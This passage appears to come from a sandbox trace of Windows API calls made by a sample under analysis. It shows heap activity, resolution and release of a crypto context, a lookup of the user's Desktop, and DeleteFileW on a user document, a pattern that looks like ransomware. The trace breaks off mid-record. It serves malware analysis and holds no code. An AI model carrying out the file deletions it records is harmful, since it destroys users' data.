dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0212.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0212.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0212.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0212.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0212.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0212.387] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0212.387] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0212.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0212.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0212.388] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0212.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0212.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0212.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0212.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0212.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0212.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0212.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0212.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0212.390] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0212.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0212.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0212.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0212.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.390] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0212.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0212.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0212.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0212.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0212.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0212.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0212.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0212.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0212.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.393] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0212.393] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0212.393] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0212.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.393] FreeLibrary (hLibModule=0x756e0000) returned 1 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0212.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0212.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0212.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.394] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0212.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0212.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0212.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0212.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0212.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0212.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0212.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0212.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0212.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0212.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0212.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0212.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0212.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0212.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0212.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.450] CloseHandle (hObject=0x2d0) returned 1 [0212.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0212.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0212.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0212.452] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0212.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0212.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0212.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0212.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0212.453] CloseHandle (hObject=0x2a0) returned 1 [0212.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0212.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0212.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0212.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0212.460] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0212.460] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0212.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0212.461] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/xTq6MCScdpqJ.odt", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\xTq6MCScdpqJ.odt", lpFilePart=0x8cedf4*="xTq6MCScdpqJ.odt") returned 0x28 [0212.461] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xTq6MCScdpqJ.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\xtq6mcscdpqj.odt")) returned 0x20 [0212.461] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xTq6MCScdpqJ.odt", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef945870, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0xecd00810, ftLastAccessTime.dwHighDateTime=0x1d5e518, ftLastWriteTime.dwLowDateTime=0xecd00810, ftLastWriteTime.dwHighDateTime=0x1d5e518, nFileSizeHigh=0x0, nFileSizeLow=0x9c99, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="xTq6MCScdpqJ.odt", cAlternateFileName="XTQ6MC~1.ODT")) returned 0xa87310 [0212.461] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xTq6MCScdpqJ.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\xtq6mcscdpqj.odt")) returned 1 [0212.494] FindNextFileW (in: hFindFile=0xa87310, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef945870, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0xecd00810, ftLastAccessTime.dwHighDateTime=0x1d5e518, ftLastWriteTime.dwLowDateTime=0xecd00810, ftLastWriteTime.dwHighDateTime=0x1d5e518, 